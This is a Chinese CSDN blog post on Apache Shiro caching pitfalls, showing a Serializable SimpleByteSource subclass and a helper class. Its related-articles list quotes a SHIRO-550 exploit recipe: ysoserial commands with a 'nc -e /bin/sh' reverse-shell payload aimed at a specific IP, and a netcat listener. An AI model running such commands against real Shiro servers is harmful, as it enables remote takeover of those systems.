Shiro配置踩坑(序列化)

最新推荐文章于 2024-08-11 22:20:54 发布
最新推荐文章于 2024-08-11 22:20:54 发布
阅读量1.2k 收藏
点赞数
分类专栏: # Shiro踩坑 shiro学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Entodie/article/details/100527053
版权

问题一:

1、在securitymanager配置 缓存管理类 cacheManager,这个cacheManager必须要在前面执行,因为setRealm 和 setSessionManage

2、源于:

将对象存入缓存中,

皆要将对象序列化

问题二:

     序列化问题:

    1、盐序列化:

我们在实现的realm类中,重写dogetAutenticationinfo:

需要将盐转换为ByteSource字节码对象:

但是该对象即实现类SimpleByteSource,没有实现serializable,导致不能序列化。

解决方法:

步骤1、继承SimpleByteSource类,实现serializable

步骤2、自定义ByteSourceUtils,加入生成SimpleByteSource静态方法

public class SimpleByteSource extends org.apache.shiro.util.SimpleByteSource

implements Serializable {

private static final long serialVersionUID = 5528101080905698238L;

public SimpleByteSource(byte[] bytes) {

super(bytes);

}

}

public class ByteSourceUtils {

public static ByteSource bytes(byte[] bytes) {

return new SimpleByteSource(bytes);

}

public static ByteSource bytes(String arg0) {

return new SimpleByteSource(arg0.getBytes());

}

}

 

 

 

Entodie
关注
专栏目录
[Java反序列化]—Shiro序列化(一)
snowlyzz的博客
12-05 7666
shiro -550 反序列化(一)
shiro 配置
upxiaofeng的专栏
09-07 471
1、web.xml配置<filter> <filter-name>shiroFilter</filter-name> <filter-class>org.springframework.web.filter.DelegatingFilterProxy</filter-class> <init-param> <param-name
SpringBoot集成Shiro、Redis,开启权限缓存,序列化SimpleAuthenticationInfo对象与AuthenticationInfo对象不匹配
易梦南蝶的博客
06-18 2429
1、场景 新建RedisCacheManager类,实现CacheManager,重写getCache(Stirng name) /** * @Description: RedisCacheManager 实例 * @author chenhang * @date 2019年6月13日 */ public class RedisCacheManager implements CacheMan...
Shiro详解
最新发布
weixin_57356976的博客
08-11 502
在web.xml文件里配置shiro的过滤shiroFilter,DelegatingFilterProxy实际上是Filter的一个代理对象,默认情况下,Spring会到IOC容查找和对应的filter bean,也可以通过targetBeanName的初始化参数来配置filter bean的id:</</</</</</</</</</</</
shiro序列化分析
2301_79724395的博客
06-11 934
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
17-java安全——shiro1.2.4反序列化分析(CVE-2016-4437)
网络安全
09-06 1886
漏洞原理 在shiro1.2.4版本中,用户认证信息rememberMe通常会进行Base64编码和AES加密存储在cookie中,当shiro安全框架对用户身份进行认证时,会对rememberMe的内容进行Base64解码和AES解密,然后反序列化还原成java对象,由于rememberMe可控,攻击者则可以利用rememberMe来构造恶意数据,产生反序列化漏洞。 漏洞环境 shiro1.2.4 jdk7u80 漏洞复现 在github下载shiro1.2.4版本,下载链接:
01.Shiro配置
qq_56403015的博客
11-05 221
shiro前期准备
ShiroExp-1.3.1-all.jar shiro序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro序列化脚本.zip
07-28
首先,我们需要使用ysoserial生成一个恶意的序列化对象,这可能涉及到选择一个合适的payload并配置相应的参数。然后,通过poc.py脚本,我们可以构造网络请求,将这个恶意的序列化对象发送给目标Shiro应用。如果应用...
shiro序列化工具,加强版
12-27
在"shiro序列化工具,加强版"这个主题中,我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞。 反序列化漏洞是由于程序在接收到网络传输的数据后,将其从二进制流恢复为对象时没有...
shiro序列化复现.zip
08-03
2. **测试环境**:可能包含一个预配置的服务环境,模拟了存在反序列化漏洞的Shiro应用,使得用户可以在可控的环境中测试漏洞复现过程。 3. **文档**:解释了如何使用提供的工具和代码,以及漏洞的工作原理和修复...
Shiro序列化流量分析.pdf
05-10
手工解密Shiro序列化攻击流量的关键在于正确地还原AES解密流程,包括理解密文的结构,提取IV和密钥,然后使用对应的加密库进行解密。CyberChef等在线工具可以帮助进行这个过程。 检测Shiro序列化漏洞的工具,如...
shiro redis使用json序列化之后异常
kevin_virus的博客
11-21 1213
shiro使用redis做缓存,并且使用了 Jackson2JsonRedisSerialize 替换默认序列化 我这边就会出一下异常 这个异常原因 应该是泛型 反序列化出问题 在redistemple 里面 加 // 使用Jackson2JsonRedisSerialize 替换默认序列化(默认采用的是JDK序列化) Jackson2JsonRedisSerializer<O...
Shiro1.2.4发序列化漏洞
xxx9686的博客
09-15 924
其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8gPSlap-1617317390954)(img/20200502103208430.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dKHhvAMo-1617317390959)(img/20200502134629288.png)]
shiro使用redis缓存session会话、authentication信息、authorization信息简述
热门推荐
_好好学习的博客
01-23 1万+
* 目录 *介绍 配置 maven依赖 spring配置 重新实现shiro CacheManager shiro缓存配置 其他说明 测试 总结 介绍  当我们使用了nginx做负载均衡,使用了多个web服务时,我们的请求会根据配置的权重信息自动分配到配置的负载服务上,这时,客户端发起的request并不能指定到同一台web服务上,这时,shiro默认的ehcache来实现共享缓存比较麻烦,这
Shiro-集成Redis序列化失败报错解决
JolyouLu的博客
06-17 1883
Shiro-集成Redis序列化失败报错解决 最近在使用Shiro集成Redis,使用分布式缓存时序列化序列化时报错,报错信息如 Cannot serialize; nested exception is org.springframework.core.serializer.support.SerializationFailedException: Failed to serialize object using DefaultSerializer; nested exception is java.
shiro序列化漏洞学习(工具+原理+复现)
wangluoanquan111的博客
04-19 1549
工具准备2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.63.shiro序列化 图形化工具4.shiro序列化 命令行工具一.Shiro-550 CVE-2016-4437序列化:在Java中,把Java对象转换为字节序列(json/xml)的过程叫序列化。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化Shiro序列化:Apache。
shiro序列化原理
06-25
4. **配置保护**:Shiro允许开发者禁用自动反序列化,或者仅在受信任的环境中启用。 **相关问题--:** 1. Shiro如何避免序列化攻击? 2. 如何在Shiro中启用对反序列化的安全控制? 3. Shiro如何配合Jackson或其他库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值